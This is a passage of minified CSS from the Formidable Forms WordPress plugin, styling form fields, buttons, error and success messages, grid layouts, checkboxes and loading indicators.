#A1A1A1;opacity: 1;}.frm_style_formidable-style.with_frm_style input:-ms-input-placeholder,frm_style_formidable-style.with_frm_style textarea:-ms-input-placeholder{color: #A1A1A1;}.frm_style_formidable-style.with_frm_style input:-moz-placeholder,.frm_style_formidable-style.with_frm_style textarea:-moz-placeholder{color: #A1A1A1;}.frm_style_formidable-style.with_frm_style .frm_default,.frm_style_formidable-style.with_frm_style input.frm_default,.frm_style_formidable-style.with_frm_style textarea.frm_default,.frm_style_formidable-style.with_frm_style select.frm_default,.frm_style_formidable-style.with_frm_style .placeholder,.frm_style_formidable-style.with_frm_style .chosen-container-multi .chosen-choices li.search-field .default,.frm_style_formidable-style.with_frm_style .chosen-container-single .chosen-default{color: #A1A1A1;}.frm_style_formidable-style.with_frm_style .form-field input:not([type=file]):focus,.frm_style_formidable-style.with_frm_style select:focus,.frm_style_formidable-style.with_frm_style textarea:focus,.frm_style_formidable-style.with_frm_style .frm_focus_field input[type=text],.frm_style_formidable-style.with_frm_style .frm_focus_field input[type=password],.frm_style_formidable-style.with_frm_style .frm_focus_field input[type=email],.frm_style_formidable-style.with_frm_style .frm_focus_field input[type=number],.frm_style_formidable-style.with_frm_style .frm_focus_field input[type=url],.frm_style_formidable-style.with_frm_style .frm_focus_field input[type=tel],.frm_style_formidable-style.with_frm_style .frm_focus_field input[type=search],.frm_form_fields_active_style,.frm_style_formidable-style.with_frm_style .frm_focus_field .frm-card-element.StripeElement,.frm_style_formidable-style.with_frm_style .chosen-container-single.chosen-container-active .chosen-single,.frm_style_formidable-style.with_frm_style .chosen-container-active .chosen-choices{background-color:#ffffff;border-color:#66afe9;color: var(--text-color);box-shadow:0 1px 1px rgba(0, 0, 0, 0.075) inset, 0 0 8px rgba(102,175,233, 0.6);}.frm_style_formidable-style.with_frm_style .frm_compact .frm_dropzone.dz-clickable .dz-message,.frm_style_formidable-style.with_frm_style input[type=submit],.frm_style_formidable-style.with_frm_style .frm_submit input[type=button],.frm_style_formidable-style.with_frm_style .frm_submit button,.frm_form_submit_style,.frm_style_formidable-style.with_frm_style .frm-edit-page-btn {width:auto;font-size:15px;height:auto;line-height:normal;text-align:center;background:#579AF6;border-width:1px;border-color: #579AF6;border-style:solid;color:#ffffff;cursor:pointer;font-weight:normal;-moz-border-radius:4px;-webkit-border-radius:4px;border-radius:4px;text-shadow:none;padding:10px 20px;-moz-box-sizing:border-box;box-sizing:border-box;-ms-box-sizing:border-box;-moz-box-shadow:0 1px 1px #eeeeee;-webkit-box-shadow:0 1px 1px #eeeeee;box-shadow:0 1px 1px #eeeeee;margin:10px;margin-left:0;margin-right:0;vertical-align:middle;}.frm_style_formidable-style.with_frm_style .frm_compact .frm_dropzone.dz-clickable .dz-message{margin:0;}.frm_style_formidable-style.with_frm_style .frm-edit-page-btn:hover,.frm_style_formidable-style.with_frm_style input[type=submit]:hover,.frm_style_formidable-style.with_frm_style .frm_submit input[type=button]:hover,.frm_style_formidable-style.with_frm_style .frm_submit button:hover{background: #efefef;border-color: #cccccc;color: #444444;}.frm_style_formidable-style.with_frm_style.frm_center_submit .frm_submit .frm_ajax_loading{margin-bottom:10px;}.frm_style_formidable-style.with_frm_style .frm-edit-page-btn:focus,.frm_style_formidable-style.with_frm_style input[type=submit]:focus,.frm_style_formidable-style.with_frm_style .frm_submit input[type=button]:focus,.frm_style_formidable-style.with_frm_style .frm_submit button:focus,.frm_style_formidable-style.with_frm_style input[type=submit]:active,.frm_style_formidable-style.with_frm_style .frm_submit input[type=button]:active,.frm_style_formidable-style.with_frm_style .frm_submit button:active{background: #efefef;border-color: #cccccc;color: #444444;outline: none;}.frm_style_formidable-style.with_frm_style .frm_loading_prev .frm_prev_page,.frm_style_formidable-style.with_frm_style .frm_loading_prev .frm_prev_page:hover,.frm_style_formidable-style.with_frm_style .frm_loading_prev .frm_prev_page:active,.frm_style_formidable-style.with_frm_style .frm_loading_prev .frm_prev_page:focus,.frm_style_formidable-style.with_frm_style .frm_loading_form .frm_button_submit,.frm_style_formidable-style.with_frm_style .frm_loading_form .frm_button_submit:hover,.frm_style_formidable-style.with_frm_style .frm_loading_form .frm_button_submit:active,.frm_style_formidable-style.with_frm_style .frm_loading_form .frm_button_submit:focus{color: transparent ;background: #579AF6;}.frm_style_formidable-style.with_frm_style .frm_loading_prev .frm_prev_page:before,.frm_style_formidable-style.with_frm_style .frm_loading_form .frm_button_submit:before {border-bottom-color: #ffffff;border-right-color: #ffffff;}.frm_style_formidable-style.with_frm_style.frm_inline_top .frm_submit::before,.frm_style_formidable-style.with_frm_style .frm_submit.frm_inline_submit::before {content:\"before\";font-size:15px;color:#3f4b5b;font-weight:normal;margin:0;padding:0 0 3px 0;width:auto;display:block;visibility:hidden;}.frm_style_formidable-style.with_frm_style.frm_inline_form .frm_submit input,.frm_style_formidable-style.with_frm_style.frm_inline_form .frm_submit button,.frm_style_formidable-style.with_frm_style .frm_submit.frm_inline_submit input,.frm_style_formidable-style.with_frm_style .frm_submit.frm_inline_submit button {margin: 0 !important;}.frm_style_formidable-style.with_frm_style #frm_field_cptch_number_container{font-size:15px;color:#3f4b5b;font-weight:normal;clear:both;}.frm_style_formidable-style.with_frm_style .frm_blank_field input[type=text],.frm_style_formidable-style.with_frm_style .frm_blank_field input[type=password],.frm_style_formidable-style.with_frm_style .frm_blank_field input[type=url],.frm_style_formidable-style.with_frm_style .frm_blank_field input[type=tel],.frm_style_formidable-style.with_frm_style .frm_blank_field input[type=number],.frm_style_formidable-style.with_frm_style .frm_blank_field input[type=email],.frm_style_formidable-style.with_frm_style .frm_blank_field textarea,.frm_style_formidable-style.with_frm_style .frm_blank_field .mce-edit-area iframe,.frm_style_formidable-style.with_frm_style .frm_blank_field select:not(.ui-datepicker-month):not(.ui-datepicker-year),.frm_form_fields_error_style,.frm_style_formidable-style.with_frm_style .frm_blank_field .frm-g-recaptcha iframe,.frm_style_formidable-style.with_frm_style .frm_blank_field .g-recaptcha iframe,.frm_style_formidable-style.with_frm_style .frm_blank_field .frm-card-element.StripeElement,.frm_style_formidable-style.with_frm_style .frm_blank_field .chosen-container-multi .chosen-choices,.frm_style_formidable-style.with_frm_style .frm_blank_field .chosen-container-single .chosen-single,.frm_style_formidable-style.with_frm_style .frm_form_field :invalid{color:#444444;background-color:#ffffff;border-color:#B94A48;border-width:1px;border-style:solid;}.frm_style_formidable-style.with_frm_style .frm_blank_field .sigWrapper{border-color:#B94A48 !important;}.frm_style_formidable-style.with_frm_style .frm_error,.frm_style_formidable-style.with_frm_style .frm_limit_error{font-weight:normal;}.frm_style_formidable-style.with_frm_style .frm_blank_field label,.frm_style_formidable-style.with_frm_style .frm_error,.frm_style_formidable-style.with_frm_style .frm_limit_error{color:#B94A48;}.frm_style_formidable-style.with_frm_style .frm_error_style{background-color:#F2DEDE;border:1px solid #EBCCD1;border-radius:4px;color: #B94A48;font-size:14px;margin:0;margin-bottom:20px;}.frm_style_formidable-style.with_frm_style #frm_loading .progress-striped .progress-bar{background-image:linear-gradient(45deg, #BFC3C8 25%, rgba(0, 0, 0, 0) 25%, rgba(0, 0, 0, 0) 50%, #BFC3C8 50%, #BFC3C8 75%, rgba(0, 0, 0, 0) 75%, rgba(0, 0, 0, 0));}.frm_style_formidable-style.with_frm_style #frm_loading .progress-bar{background-color:#ffffff;}.frm_style_formidable-style.with_frm_style .frm_form_field.frm_total_big input,.frm_style_formidable-style.with_frm_style .frm_form_field.frm_total_big textarea,.frm_style_formidable-style.with_frm_style .frm_form_field.frm_total input,.frm_style_formidable-style.with_frm_style .frm_form_field.frm_total textarea{color: #555555;background-color:transparent;border:none;display:inline;width:auto;padding:0;}.frm_ajax_loading{visibility:hidden;width:auto;}.frm_form_submit_style{height:auto;}a.frm_save_draft{cursor:pointer;}.with_frm_style a.frm_save_draft,.with_frm_style a.frm_start_over{font-size:15px;font-size:var(--submit-font-size);font-weight:normal;font-weight:var(--submit-weight);}.horizontal_radio .frm_radio{margin:0 5px 0 0;}.horizontal_radio .frm_checkbox{margin:0;margin-right:5px;}.vertical_radio .frm_checkbox,.vertical_radio .frm_radio,.vertical_radio .frm_catlevel_1{display:block;}.horizontal_radio .frm_checkbox,.horizontal_radio .frm_radio,.horizontal_radio .frm_catlevel_1{display:inline-block;padding-left: 0;}.with_frm_style .frm_radio{display:block;display:var(--radio-align);}.with_frm_style .frm_checkbox{display:block;display:var(--check-align);}.with_frm_style .vertical_radio .frm_checkbox,.with_frm_style .vertical_radio .frm_radio,.vertical_radio .frm_catlevel_1{display:block;}.with_frm_style .horizontal_radio .frm_checkbox,.with_frm_style .horizontal_radio .frm_radio,.horizontal_radio .frm_catlevel_1{display:inline-block;}.with_frm_style .frm_checkbox label,.with_frm_style .frm_radio label{display: inline;white-space:normal;}.with_frm_style .vertical_radio .frm_checkbox label,.with_frm_style .vertical_radio .frm_radio label{display: block;padding-left: 20px;text-indent: -20px;}.with_frm_style .frm_radio label,.with_frm_style .frm_checkbox label{font-size:13px;font-size:var(--check-font-size);color:#444444;color:var(--check-label-color);font-weight:normal;font-weight:var(--check-weight);line-height: 1.3;}.with_frm_style .frm_radio input[type=radio],.with_frm_style .frm_checkbox input[type=checkbox] {font-size:13px;font-size:var(--check-font-size);position:static;}.frm_file_container .frm_file_link,.with_frm_style .frm_radio label .frm_file_container,.with_frm_style .frm_checkbox label .frm_file_container{display:inline-block;margin:5px;vertical-align:middle;}.with_frm_style .frm_radio input[type=radio]{border-radius:50%;}.with_frm_style .frm_checkbox input[type=checkbox]{border-radius:0;}.with_frm_style .frm_radio input[type=radio],.with_frm_style .frm_checkbox input[type=checkbox]{-webkit-appearance: none;appearance: none;background-color: var(--bg-color);flex: none;display:inline-block !important;margin: 0 5px 0 0;color: var(--border-color);width: 18px;min-width: 18px;height: 18px;border: 1px solid currentColor;border-color: var(--border-color);vertical-align: middle;position: initial; padding: 0;}.with_frm_style .frm_radio input[type=radio]:before,.with_frm_style .frm_checkbox input[type=checkbox]:before {content: \'\';width: 12px;height: 12px;border-radius: 50%;transform: scale(0);transition: 120ms transform ease-in-out;box-shadow: inset 10px 10px var(--text-color);display: block;margin: 2px 0 0 2px;}.with_frm_style .frm_checkbox input[type=checkbox]:before{clip-path: polygon(14% 44%, 0 65%, 50% 100%, 100% 16%, 80% 0%, 43% 62%);border-radius: 0;}.with_frm_style .frm_radio input[type=radio]:checked:before,.with_frm_style .frm_checkbox input[type=checkbox]:checked:before {transform: scale(1);}.with_frm_style :invalid,.with_frm_style :-moz-submit-invalid,.with_frm_style :-moz-ui-invalid{box-shadow:none;}.with_frm_style .frm_error_style img{padding-right:10px;vertical-align:middle;border:none;}.with_frm_style .frm_trigger{cursor:pointer;}.with_frm_style .frm_error_style,.with_frm_style .frm_message,.frm_success_style{-moz-border-radius:4px;-webkit-border-radius:4px;border-radius:4px;padding:15px;}.with_frm_style .frm_message p{margin-bottom:5px;color:#468847;color:var(--success-text-color);}.with_frm_style .frm_message,.frm_success_style{margin:5px 0 15px;border:1px solid #D6E9C6;border-color:var(--success-border-color);background-color:#DFF0D8;background-color:var(--success-bg-color);color:#468847;color:var(--success-text-color);border-radius:4px;border-radius:var(--border-radius);font-size:14px;font-size:var(--success-font-size);}.with_frm_style .frm_plain_success .frm_message {background-color: transparent;padding:0;border:none;font-size:inherit;color:inherit;}.with_frm_style .frm_plain_success .frm_message p {color:inherit;}.frm_form_fields_style,.frm_form_fields_active_style,.frm_form_fields_error_style,.frm_form_submit_style{width:auto;}.with_frm_style .frm_trigger span{float:left;}.with_frm_style table.frm-grid,#content .with_frm_style table.frm-grid{border-collapse:collapse;border:none;}.frm-grid td,.frm-grid th{padding:5px;border-width:1px;border-style:solid;border-color:#BFC3C8;border-color:var(--border-color);border-top:none;border-left:none;border-right:none;}.frm-alt-table {width:100%;border-collapse:separate;margin-top:0.5em;font-size:15px;border-width:1px;}.with_frm_style .frm-alt-table{border-color:#BFC3C8;border-color:var(--border-color);}.frm-alt-table th {width:200px;}.frm-alt-table tr {background-color:transparent;}.frm-alt-table th,.frm-alt-table td {background-color:transparent;vertical-align:top;text-align:left;padding:20px;border-color:transparent;}.frm-alt-table tr:nth-child(even) {background-color:#ecf0f5;}table.form_results.with_frm_style{border:1px solid #BFC3C8;border-width:var(--field-border-width);border-color:var(--border-color);}table.form_results.with_frm_style tr td{text-align:left;padding:7px 9px;color:#555555;color:var(--text-color);border-top:1px solid #BFC3C8;border-top-width:var(--field-border-width);border-top-color:var(--border-color);}table.form_results.with_frm_style tr.frm_even,.frm-grid .frm_even{background-color:#fff;background-color:var(--bg-color);}table.form_results.with_frm_style tr.frm_odd,.frm-grid .frm_odd{background-color:#ffffff;background-color:var(--bg-color);}.frm_color_block {background-color:#ecf0f5;padding: 40px;}.with_frm_style .frm-show-form .frm_color_block.frm_section_heading h3,.frm_color_block.frm_section_heading h3 {border-width: 0 !important;}.frm_collapse .ui-icon{display:inline-block;}.frm_toggle_container{border:1px solid transparent;}.frm_toggle_container ul{margin:5px 0;padding-left:0;list-style-type:none;}.frm_toggle_container .frm_month_heading{text-indent:15px;}.frm_toggle_container .frm_month_listing{margin-left:40px;}#frm_loading{display:none;position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999;}#frm_loading h3{font-weight:500;padding-bottom:15px;color:#fff;font-size:24px;}#frm_loading_content{position:fixed;top:20%;left:33%;width:33%;text-align:center;padding-top:30px;font-weight:bold;z-index:9999999;}#frm_loading img{max-width:100%;}#frm_loading .progress{border-radius:4px;box-shadow:0 1px 2px rgba(0, 0, 0, 0.1) inset;height:20px;margin-bottom:20px;overflow:hidden;}#frm_loading .progress.active .progress-bar{animation:2s linear 0s normal none infinite progress-bar-stripes;}#frm_loading .progress-striped .progress-bar{background-image:linear-gradient(45deg, #BFC3C8 25%, rgba(0, 0, 0, 0) 25%, rgba(0, 0, 0, 0) 50%, #BFC3C8 50%, #BFC3C8 75%, rgba(0, 0, 0, 0) 75%, rgba(0, 0, 0, 0));background-size:40px 40px;}#frm_loading .progress-bar{background-color:#ffffff;background-color:var(--bg-color);box-shadow:0 -1px 0 rgba(0, 0, 0, 0.15) inset;float:left;height:100%;line-height:20px;text-align:center;transition:width 0.6s ease 0s;width:100%;}.frm_image_from_url{height:50px;}.frm-loading-img{background:url(https://gsw2023.com/wp-content/plugins/formidable/images/ajax_loader.gif) no-repeat center center;padding:6px 12px;}select.frm_loading_lookup{background-image: url(https://gsw2023.com/wp-content/plugins/formidable/images/ajax_loader.gif) !important;background-position: 10px;background-repeat: no-repeat;color: transparent !important;}.frm_screen_reader {border: 0;clip: rect(1px, 1px, 1px, 1px);-webkit-clip-path: inset(50%);clip-path: inset(50%);height: 1px;margin: -1px;overflow: hidden;padding: 0;position: absolute;width: 1px;word-wrap: normal !important; }.frm_screen_reader.frm_hidden{display:initial;}.frm_verify{position:absolute;left:-3000px;}.frm_clear_none{clear:none;}.frm_clear{clear:both;}.frm_form_field.frm_alignright{float:right !important;}.with_frm_style .frm_form_field{clear:both;}.frm_combo_inputs_container,.frm_grid_container,.frm_form_fields .frm_section_heading,.frm_form_fields .frm_fields_container{display:grid;grid-template-columns: repeat(12, 1fr);grid-auto-rows: max-content;grid-gap: 0 2%;}.frm_combo_inputs_container > *,.frm_grid_container > *,.frm_section_heading > *,.frm_fields_container .frm_form_field,.frm_fields_container > *{grid-column: span 12 / span 12;}.frm_inline,.frm_form_field.frm_left_inline,.frm_form_field.frm_first_inline,.frm_form_field.frm_inline,.frm_submit.frm_inline,.frm_form_field.frm_right_inline,.frm_form_field.frm_last_inline{width:auto;grid-column: span 2 / span 2;}.frm6,.frm_half,.frm_form_field.frm_three_fifths, .frm_form_field.frm6,.frm_submit.frm6,.frm_form_field.frm_left_half,.frm_form_field.frm_right_half,.frm_form_field.frm_first_half,.frm_form_field.frm_last_half,.frm_form_field.frm_half,.frm_submit.frm_half{grid-column:span 6 / span 6;}.frm4,.frm_third,.frm_form_field.frm_two_fifths, .frm_form_field.frm4,.frm_submit.frm4,.frm_form_field.frm_left_third,.frm_form_field.frm_third,.frm_submit.frm_third,.frm_form_field.frm_right_third,.frm_form_field.frm_first_third,.frm_form_field.frm_last_third{grid-column:span 4 / span 4;}.frm8,.frm_two_thirds,.frm_form_field.frm8,.frm_submit.frm8,.frm_form_field.frm_left_two_thirds,.frm_form_field.frm_right_two_thirds,.frm_form_field.frm_first_two_thirds,.frm_form_field.frm_last_two_thirds,.frm_form_field.frm_two_thirds{grid-column: span 8/span 8;}.frm3,.frm_fourth,.frm_form_field.frm3,.frm_submit.frm3,.frm_form_field.frm_left_fourth,.frm_form_field.frm_fourth,.frm_submit.frm_fourth,.frm_form_field.frm_right_fourth,.frm_form_field.frm_first_fourth,.frm_form_field.frm_last_fourth{grid-column: span 3/span 3;}.frm9,.frm_three_fourths,.frm_form_field.frm_four_fifths, .frm_form_field.frm9,.frm_submit.frm9,.frm_form_field.frm_three_fourths{grid-column: span 9/span 9;}.frm_form_field.frm_left_fifth,.frm_form_field.frm_fifth,.frm_submit.frm_fifth,.frm_form_field.frm_right_fifth,.frm_form_field.frm_first_fifth,.frm_form_field.frm_last_fifth{grid-column: span 2/span 2;}.frm2,.frm_sixth,.frm_form_field.frm2,.frm_submit.frm2,.frm_form_field.frm_sixth,.frm_submit.frm_sixth,.frm_form_field.frm_first_sixth,.frm_form_field.frm_last_sixth{grid-column: span 2/span 2;}.frm10,.frm_form_field.frm10,.frm_submit.frm10{grid-column: span 10/span 10;}.frm1,.frm_form_field.frm1,.frm_submit.frm1,.frm_form_field.frm_seventh,.frm_submit.frm_seventh,.frm_form_field.frm_first_seventh,.frm_form_field.frm_last_seventh.frm_form_field.frm_eighth,.frm_submit.frm_eighth,.frm_form_field.frm_first_eighth,.frm_form_field.frm_last_eighth{grid-column: span 1/span 1;}.frm5,.frm_form_field.frm5,.frm_submit.frm5{grid-column: span 5/span 5;}.frm7,.frm_form_field.frm7,.frm_submit.frm7{grid-column: span 7/span 7;}.frm11,.frm_form_field.frm11,.frm_submit.frm11{grid-column: span 11/span 11;}.frm12,.frm_full,.frm_full .wp-editor-wrap,.frm_full > input:not([type=\'checkbox\']):not([type=\'radio\']):not([type=\'button\']),.frm_full select,.frm_full textarea{width:100% !important;grid-column: span 12/span 12;box-sizing: border-box;}.frm_full .wp-editor-wrap input{width:auto !important;}.frm_first,.frm_form_field.frm_left_half,.frm_form_field.frm_left_third,.frm_form_field.frm_left_two_thirds,.frm_form_field.frm_left_fourth,.frm_form_field.frm_left_fifth,.frm_form_field.frm_left_inline,.frm_form_field.frm_first_half,.frm_form_field.frm_first_third,.frm_form_field.frm_first_two_thirds,.frm_form_field.frm_first_fourth,.frm_form_field.frm_first_fifth,.frm_form_field.frm_first_sixth,.frm_form_field.frm_first_seventh,.frm_form_field.frm_first_eighth,.frm_form_field.frm_first_inline,.frm_form_field.frm_first{grid-column-start:1;}.frm_last,.frm_form_field.frm_last,.frm_form_field.frm_alignright{grid-column-end:-1;justify-content: end;}.with_frm_style.frm_rtl .frm_form_fields .star-rating{float:right;}.with_frm_style.frm_rtl .frm_grid .frm_primary_label,.with_frm_style.frm_rtl .frm_grid_first .frm_primary_label,.with_frm_style.frm_rtl .frm_grid_odd .frm_primary_label,.with_frm_style.frm_rtl .frm_grid .frm_radio,.with_frm_style.frm_rtl .frm_grid_first .frm_radio,.with_frm_style.frm_rtl .frm_grid_odd .frm_radio,.with_frm_style.frm_rtl .frm_grid .frm_checkbox,.with_frm_style.frm_rtl .frm_grid_first .frm_checkbox,.with_frm_style.frm_rtl .frm_grid_odd .frm_checkbox{float:right !important;margin-right:0 !important;}.with_frm_style.frm_rtl .frm_grid_first .frm_radio label input,.with_frm_style.frm_rtl .frm_grid .frm_radio label input,.with_frm_style.frm_rtl .frm_grid_odd .frm_radio label input,.with_frm_style.frm_rtl .frm_grid_first .frm_checkbox label input,.with_frm_style.frm_rtl .frm_grid .frm_checkbox label input,.with_frm_style.frm_rtl .frm_grid_odd .frm_checkbox label input{float:left;}.with_frm_style.frm_rtl .frm_catlevel_2,.with_frm_style.frm_rtl .frm_catlevel_3,.with_frm_style.frm_rtl .frm_catlevel_4,.with_frm_style.frm_rtl .frm_catlevel_5{margin-right:18px;}.with_frm_style.frm_rtl div > .frm_time_select{margin-right:5px;}.frm_form_field.frm_inline_container,.frm_form_field.frm_right_container,.frm_form_field.frm_left_container{display: grid;grid-template-columns: 25% auto;width:100%;grid-auto-rows: min-content;}.frm_form_field.frm_right_container{grid-template-columns: auto 25%;}.frm_form_field.frm_inline_container{grid-template-columns: repeat(2, minmax(auto, max-content) );}.frm_form_field.frm_inline_container .frm_primary_label,.frm_form_field.frm_right_container .frm_primary_label,.frm_form_field.frm_left_container .frm_primary_label{margin-right:10px;grid-row:span 2/span 2;padding-top:4px;}.frm_form_field.frm_left_container .frm_primary_label{grid-column:1;grid-row:span 2/span 2; }.frm_form_field.frm_right_container .frm_primary_label{grid-column:2;grid-row:1;margin-right:0;margin-left:10px;}.frm_form_field.frm_inline_container .frm_description,.frm_form_field.frm_left_container .frm_description{grid-column:2;}.frm_form_field.frm_right_container .frm_description{grid-column:1;}.frm_conf_field.frm_left_container{grid-template-columns: 67%;}.frm_conf_field.frm_left_container .frm_description{grid-column:1;}.frm-fade-in {-webkit-animation-name: fadeIn;animation-name: fadeIn;-webkit-animation-duration: 1s;animation-duration: 1s;-webkit-animation-fill-mode: both;animation-fill-mode: both;}@keyframes spin {0% { transform: rotate(0deg); }100% { transform: rotate(360deg); }}@keyframes fadeIn {   0% {opacity: 0;}   100% {opacity: 1;}}@media only screen and (max-width: 750px) {.frm_grid_container.frm_no_grid_750 > div{grid-column: span 12/span 12;}}@media only screen and (max-width: 600px) {.frm_section_heading > .frm_form_field,.frm_fields_container > .frm_submit,.frm_grid_container > .frm_form_field,.frm_fields_container > .frm_form_field{grid-column: 1 / span 12 !important;}.frm_grid_container.frm_no_grid_600,.frm_form_field.frm_inline_container,.frm_form_field.frm_right_container,.frm_form_field.frm_left_container{display:block;}}.frm_conf_field.frm_left_container .frm_primary_label{display:none;}.wp-editor-wrap *,.wp-editor-wrap *:after,.wp-editor-wrap *:before{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}.with_frm_style .frm_grid,.with_frm_style .frm_grid_first,.with_frm_style .frm_grid_odd{clear:both;margin-bottom:0 !important;padding:5px;border-width:1px;border-style:solid;border-color:#BFC3C8;border-color:var(--border-color);border-left:none;border-right:none;}.with_frm_style .frm_grid,.with_frm_style .frm_grid_odd{border-top:none;}.frm_grid .frm_error,.frm_grid_first .frm_error,.frm_grid_odd .frm_error,.frm_grid .frm_limit_error,.frm_grid_first .frm_limit_error,.frm_grid_odd .frm_limit_error{display:none;}.frm_grid:after,.frm_grid_first:after,.frm_grid_odd:after{visibility:hidden;display:block;font-size:0;content:\" \";clear:both;height:0;}.frm_grid_first{margin-top:20px;}.frm_grid_first,.frm_grid_odd{background-color:#ffffff;background-color:var(--bg-color);}.frm_grid{background-color:#ffffff;background-color:var(--bg-color-active);}.with_frm_style .frm_grid.frm_blank_field,.with_frm_style .frm_grid_first.frm_blank_field,.with_frm_style .frm_grid_odd.frm_blank_field{background-color:#F2DEDE;background-color:var(--error-bg);border-color:#EBCCD1;border-color:var(--error-bg);}.frm_grid .frm_primary_label,.frm_grid_first .frm_primary_label,.frm_grid_odd .frm_primary_label,.frm_grid .frm_radio,.frm_grid_first .frm_radio,.frm_grid_odd .frm_radio,.frm_grid .frm_checkbox,.frm_grid_first .frm_checkbox,.frm_grid_odd .frm_checkbox{float:left !important;display:block;margin-top:0;margin-left:0 !important;}.frm_grid_first .frm_radio label,.frm_grid .frm_radio label,.frm_grid_odd .frm_radio label,.frm_grid_first .frm_checkbox label,.frm_grid .frm_checkbox label,.frm_grid_odd .frm_checkbox label{visibility:hidden;white-space:nowrap;text-align:left;}.frm_grid_first .frm_radio label input,.frm_grid .frm_radio label input,.frm_grid_odd .frm_radio label input,.frm_grid_first .frm_checkbox label input,.frm_grid .frm_checkbox label input,.frm_grid_odd .frm_checkbox label input{visibility:visible;margin:2px 0 0;float:right;}.frm_grid .frm_radio,.frm_grid_first .frm_radio,.frm_grid_odd .frm_radio,.frm_grid .frm_checkbox,.frm_grid_first .frm_checkbox,.frm_grid_odd .frm_checkbox{display:inline;}.frm_grid_2 .frm_radio,.frm_grid_2 .frm_checkbox,.frm_grid_2 .frm_primary_label{width:48% !important;}.frm_grid_2 .frm_radio,.frm_grid_2 .frm_checkbox{margin-right:4%;}.frm_grid_3 .frm_radio,.frm_grid_3 .frm_checkbox,.frm_grid_3 .frm_primary_label{width:30% !important;}.frm_grid_3 .frm_radio,.frm_grid_3 .frm_checkbox{margin-right:3%;}.frm_grid_4 .frm_radio,.frm_grid_4 .frm_checkbox{width:20% !important;}.frm_grid_4 .frm_primary_label{width:28% !important;}.frm_grid_4 .frm_radio,.frm_grid_4 .frm_checkbox{margin-right:4%;}.frm_grid_5 .frm_primary_label,.frm_grid_7 .frm_primary_label{width:24% !important;}.frm_grid_5 .frm_radio,.frm_grid_5 .frm_checkbox{width:17% !important;margin-right:2%;}.frm_grid_6 .frm_primary_label{width:25% !important;}.frm_grid_6 .frm_radio,.frm_grid_6 .frm_checkbox{width:14% !important;margin-right:1%;}.frm_grid_7 .frm_primary_label{width:22% !important;}.frm_grid_7 .frm_radio,.frm_grid_7 .frm_checkbox{width:12% !important;margin-right:1%;}.frm_grid_8 .frm_primary_label{width:23% !important;}.frm_grid_8 .frm_radio,.frm_grid_8 .frm_checkbox{width:10% !important;margin-right:1%;}.frm_grid_9 .frm_primary_label{width:20% !important;}.frm_grid_9 .frm_radio,.frm_grid_9 .frm_checkbox{width:9% !important;margin-right:1%;}.frm_grid_10 .frm_primary_label{width:19% !important;}.frm_grid_10 .frm_radio,.frm_grid_10 .frm_checkbox{width:8% !important;margin-right:1%;}.frm_form_field.frm_inline_container .frm_opt_container,.frm_form_field.frm_right_container .frm_opt_container,.frm_form_field.frm_left_container .frm_opt_container{padding-top:4px;}.with_frm_style .frm_inline_container.frm_grid_first .frm_primary_label,.with_frm_style .frm_inline_container.frm_grid .frm_primary_label,.with_frm_style .frm_inline_container.frm_grid_odd .frm_primary_label,.with_frm_style .frm_inline_container.frm_grid_first .frm_opt_container,.with_frm_style .frm_inline_container.frm_grid .frm_opt_container,.with_frm_style .frm_inline_container.frm_grid_odd .frm_opt_container{margin-right:0;}.frm_form_field.frm_two_col .frm_opt_container,.frm_form_field.frm_three_col .frm_opt_container,.frm_form_field.frm_four_col .frm_opt_container{display: grid;grid-template-columns: repeat(2, 1fr);grid-auto-rows: max-content;grid-gap: 0 2.5%;}.frm_form_field.frm_three_col .frm_opt_container{grid-template-columns: repeat(3, 1fr);}.frm_form_field.frm_four_col .frm_opt_container{grid-template-columns: repeat(4, 1fr);}.frm_form_field.frm_two_col .frm_radio,.frm_form_field.frm_two_col .frm_checkbox,.frm_form_field.frm_three_col .frm_radio,.frm_form_field.frm_three_col .frm_checkbox,.frm_form_field.frm_four_col .frm_radio,.frm_form_field.frm_four_col .frm_checkbox{grid-column-end: span 1;}.frm_form_field .frm_checkbox,.frm_form_field .frm_checkbox + .frm_checkbox,.frm_form_field .frm_radio,.frm_form_field .frm_radio + .frm_radio{margin-top: 0;margin-bottom: 0;}.frm_form_field.frm_scroll_box .frm_opt_container{height:100px;overflow:auto;}.frm_html_container.frm_scroll_box,.frm_form_field.frm_html_scroll_box{height:100px;overflow:auto;background-color:#ffffff;background-color:var(--bg-color);border-color:#BFC3C8;border-color:var(--border-color);border-width:1px;border-width:var(--field-border-width);border-style:solid;border-style:var(--field-border-style);-moz-border-radius:4px;-webkit-border-radius:4px;border-radius:4px;border-radius:var(--border-radius);width:100%;width:var(--field-width);max-width:100%;font-size:14px;font-size:var(--field-font-size);padding:6px 10px;padding:var(--field-pad);-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;outline:none;font-weight:normal;box-shadow:var(--box-shadow);}.frm_form_field.frm_total_big input,.frm_form_field.frm_total_big textarea,.frm_form_field.frm_total input,.frm_form_field.frm_total textarea{opacity:1;background-color:transparent !important;border:none !important;font-weight:bold;-moz-box-shadow:none;-webkit-box-shadow:none;width:auto !important;height:auto !important;box-shadow:none !important;display:inline;-moz-appearance:textfield;padding:0;}.frm_form_field.frm_total_big input::-webkit-outer-spin-button,.frm_form_field.frm_total_big input::-webkit-inner-spin-button,.frm_form_field.frm_total input::-webkit-outer-spin-button,.frm_form_field.frm_total input::-webkit-inner-spin-button {-webkit-appearance: none;}.frm_form_field.frm_total_big input:focus,.frm_form_field.frm_total_big textarea:focus,.frm_form_field.frm_total input:focus,.frm_form_field.frm_total textarea:focus{background-color:transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none;}.frm_form_field.frm_label_justify .frm_primary_label{text-align:justify !important;}.frm_form_field.frm_capitalize input,.frm_form_field.frm_capitalize select,.frm_form_field.frm_capitalize .frm_opt_container label{text-transform:capitalize;}.frm_clearfix:after{content:\".\";display:block;clear:both;visibility:hidden;line-height:0;height:0;}.frm_clearfix{display:block;}.with_frm_style .frm_repeat_sec .frm_form_field.frm_repeat_buttons .frm_icon_font::before {color:#ffffff;color:var(--repeat-icon-color);}.with_frm_style .frm_combo_inputs_container > .frm_form_subfield-first,.with_frm_style .frm_combo_inputs_container > .frm_form_subfield-middle,.with_frm_style .frm_combo_inputs_container > .frm_form_subfield-last {margin-bottom: 0 !important;}@media only screen and (max-width: 900px) {.frm_form_field .frm_repeat_grid .frm_form_field.frm_sixth .frm_primary_label,.frm_form_field .frm_repeat_grid .frm_form_field.frm_seventh .frm_primary_label,.frm_form_field .frm_repeat_grid 